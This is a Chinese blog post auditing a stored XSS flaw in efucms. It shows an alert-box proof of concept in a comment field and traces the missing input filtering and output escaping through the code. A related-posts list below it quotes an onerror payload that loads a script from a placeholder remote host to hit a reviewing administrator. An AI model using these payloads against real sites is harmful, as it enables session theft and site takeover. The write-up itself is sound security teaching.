xss跳转代码_从某cms的xss漏洞来学习代码审计

最新推荐文章于 2021-09-27 21:26:56 发布
最新推荐文章于 2021-09-27 21:26:56 发布
阅读量85 收藏
点赞数
文章标签: xss跳转代码

327e7e6c5bfca745f9d9e794ca01e40c.png

原创: xiaoyuer 合天智汇

各位大佬好,小弟的文章主要是通过针对具体的cms(内容管理系统)对一些基本的web漏洞进行挖掘和代码审计,这样学习起来能够理解的更加深刻。如有写的不对的地方请轻拍。
cms选择了efucms:https://github.com/phplaber/efucms
按照readme中给出的安装方式进行安装;
安装完成后的界面如图所示:

8637b50e01a89255e039301197292d83.png


随便点开一个文章:
发现文章最下方有发表评论的内容,那么首先想到的是xss漏洞。

2144e4f032dc8693c9e192c1525d1c41.png

存储型XSS漏洞验证过程:
在评论的称呼中写入
test</textarea><script>alert(1)</script>

2db220a3234d946d2921badb8534357f.png


提交发表,发现已经弹窗执行了脚本(在此之前并没有注入xss脚本);

1b28083d137865a508a1657c76a5ce1f.png


登录后台:

39d26ac61f6a07e45169fe807a3dd064.png


在后台管理界面,点击评论管理可以看到代码也已经执行:

ef646c66f8d2031e9f2b7a1f585711e7.png


所以,存在存储型xss漏洞;漏洞分析首先,未过滤就存进了数据库:
查看源代码:

9488cb1a27aee3a79348af17971cc807.png


POST到了article/comment中

54ad88554bf414f6f1c90ef08d7949a0.png


跳转定位到对应的位置:

a0295c3d31ede8ade7c1dcdaf53d4f92.png


发现引用了M函数;然后调用create方法,最后在87行写入了数据库;
首先分析M函数是否有过滤:
M函数定义位于:
ThinkPHPCommonThinkPHPCommon目录下functions.php

b29587bcf68e4600f1f8488c63d6886c.png


发现没有;
之后创建了一个comment的Model

a03083ef9e26b4f30333e89fcce356a7.png


也并未进行过滤;
最后通过add方法就存进了数据库;

387473b2d7a14b7f0e378c862d7e838c.png

在管理员界面显示处也未过滤:
在adminRunCache下生成的一个运行时文件(我这里是:e050f9b27a9bbae1b0a3c73a95217912.php)

0713507763c765f4ee335668be994b39.png


直接就进行了echo输出。
最终导致了xss的发生。
下一次将挖掘SQL注入漏洞,并进行代码审计。

weixin_39636696
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过代码审计找出网站中的XSS漏洞实战
02-24
反向审计打蛇打七寸,说明在关键位置做事效率会更高,代码审计找出漏洞也是同理,因此笔者需要找出XSS关键的位置;对于目前的大多数Web应用来说,MVC模式是非常主流的一种形式,因此笔者这里将找到对应的控制器和模板...
XSS攻击【CMS,DVWA】通关技巧
qq_62199249的博客
07-01 645
打开BP->Proxy->Proxy settings->Tools->Proxy->Match and replace rules->add。安全配置是以白名单的形式对用户输入做过滤,若不为选项中的值便跳到Englisgh。安全配置对提交的值做检查,如果有
存储型XSS CMS实战
她叫常玉莹
08-10 1388
Dedecms存储型xss 影响版本 DedeCMS-V5.7-UTF8-SP2,网站需要开启商城功能。 漏洞分析 address、des、email、postname参数过滤不严导致xss漏洞。postname只对长度做了限制。跟踪cn_substrR函数,跳转到string.helper.php文件中。 只使用stripslashes、addslashes函数进行了过滤,导致xss触发 漏洞修复 使用htmlspecialchars将html标签进行实体转义 修复结果 phpmywind_5.3
漏洞学习——XSS】bagecms存储型xss可叉后台
Fly_鹏程万里
02-22 1280
漏洞细节 0x0A 前面发现留言板的过滤已经做的很好了,现在来说一个可以直接拿到管理员并且在后台修改php模板 getshell 的方法0x0B 首先我们来到了他的后台 0x0C 输入一串神奇的 xss  0x0D 登陆后台可以查看到,整个已经变形了,也就是说 logger 没有对 log 进行过滤记录,导致了存储型 XSS 。 0x0E 我们来看看这一项的代码 修复方案...
js获取header_【超详细入门教程】通过xss获取管理员明文账号密码
weixin_39662611的博客
12-01 677
0x00前言本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。随着开发者安全意识的提高,现在基本上都是开了httponly了,也就是说xss无法读取到cookie了(除了包含登...
BLUDIT CMS xss
F_carry的博客
08-09 4185
Visit the CMS home page and find that the JS code for the article content section is Log on in the background, there is an article release module You can see the successful pop-up window, execut...
XSS_Rays.zip_XSS Rays 下载_tool_xss扫描_xss扫描器_漏洞扫描
09-22
最近The Spanner发布了一个名为XSS Rays的 XSS漏洞扫描器。这tool有点意思,是使用JS写的,JS遍历目标的link、form,然后构造测试用例去测试,可以发现DOM的XSS(当然是在测试用例打对了的情况下)。它的调用方式也...
bolt_cms_V3.7.0_xss和远程代码执行漏洞1
08-03
在本文中,我们将探讨Bolt CMS V3.7.0中存在的XSS(跨站脚本攻击)和远程代码执行漏洞。Bolt CMS是一个基于PHP的内容管理系统,它在处理用户输入时存在的安全疏漏可能导致恶意攻击者利用这些漏洞进行一系列的攻击...
web漏洞XSS_TEST漏洞实践练习代码
04-25
本资源"XSS_TEST漏洞实践练习代码"提供了实践XSS攻击与防御的平台,帮助学习者深入理解XSS的工作原理和防范措施。 XSS分为三种类型:存储型XSS、反射型XSS和DOM型XSS。 1. 存储型XSS:攻击者将恶意脚本存储在目标...
蝉知CMS 7.X XSS漏洞复现
qq_35664104的博客
09-27 1418
个人博客地址:xzajyjs.cn 作为一个开源的企业门户系统(EPS), 企业可以非常方便地搭建一个专业的企业营销网站,进行宣传,开展业务,服务客户。蝉知系统内置了文章、产品、论坛、评论、会员、博客、帮助等功能,同时还可以和微信进行集成绑定。功能丰富实用,后台操作简洁方便。蝉知系统还内置了搜索引擎优化必备的功能,比如关键词,摘要,站点地图,友好路径等,使用蝉知系统可以非常方便的搭建对搜索引擎友好的网站。 今天就对他的早期版本7.x的xss漏洞进行复现。 进到他的主页,先观察到有留言板,可以考虑是否存在
xss跳转代码_XSS(跨站脚本攻击)
weixin_39564831的博客
11-20 1772
XSS攻击流程 1、攻击者将恶意代码注入到服务器中 2、用户在没有防备的情况下访问服务器 3、服务器将含有恶意代码的网页响应给客户端 4、在客户端浏览器中触发恶意的JS代码XSS危害 1、盗取各种用户账号 2、窃取用户Cookie资料,冒充用户身份进入网站 3、劫持用户会话,执行任意操作 4、刷流量,执行弹窗广告 5、传播病毒XSS漏洞的验证 POC 漏洞的验证与检测 E...
漏洞学习——XSS】fineCMS免费版xss+getshell
Fly_鹏程万里
02-22 1831
漏洞细节 注册一个用户,在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属性 onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞 然后是getsh...
VB机动车租赁管理系统设计(源代码+系统+开题报告+答辩PPT).zip
08-18
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
计算机毕业设计jsp篮球NBA周边商城vue论文
08-18
计算机毕业设计jsp篮球NBA周边商城vue论文
分享几款开源的后台框架
08-18
X-admin v2.0
计算机毕业设计jsp古玩玉器交易系统vue论文
08-18
计算机毕业设计jsp古玩玉器交易系统vue论文
数据库技术:Redis.zip
08-18
后端技术系列教程,包括: API开发全套教程 后端安全全套教程 后端微服务架构全套教程 后端性能优化全套教程 后端框架全套教程 后端缓存技术全套教程 后端编程语言全套教程 数据库技术全套教程
DzzOffice kkFileView插件 V1.20.1
最新发布
08-18
基于DzzOffice开发。一个基于Spring Boot的文件文档在线预览解决方案应用,支持多种文件格式和预览模式,易于部署和使用。基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。 更多详细说明请访问 DzzOffice 小胡团队 查看。 DzzOffice 小胡版安装和升级插件说明(详细教程请在DzzOffice 笔记中查看): 下载并解压插件后,请将解压后的插件文件夹以"kkFileView"命名的方式放置在网站的"dzz"目录下(若该目录下已存在同名文件夹,请先删除原文件夹后再放置新文件夹)。 升级的用户在系统工具中清理缓存即可; 对于首次安装的用户,请在应用市场右下角选择“导入”功能,然后选择要导入的文件,即文件夹下的“dzz_app_kkFileView.xml”。选择文件后点击“提交”按钮完成安装。 请严格按照上述步骤操作,以确保插件能够正确安装和升级。如在操作过程中遇到任何问题,请访问团队主页或查阅DzzOffice 笔记以获取更多帮助。
通达OA系统代码审计XSS与SSRF漏洞及防范措施
总结来说,这份审计文档强调了在大型项目中代码审计的重要性,特别是关注XSS、SSRF和SQL注入等常见的Web应用程序安全威胁,并提供了如何识别和修复这些问题的具体示例。阅读这份文档有助于开发者理解和提升应用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值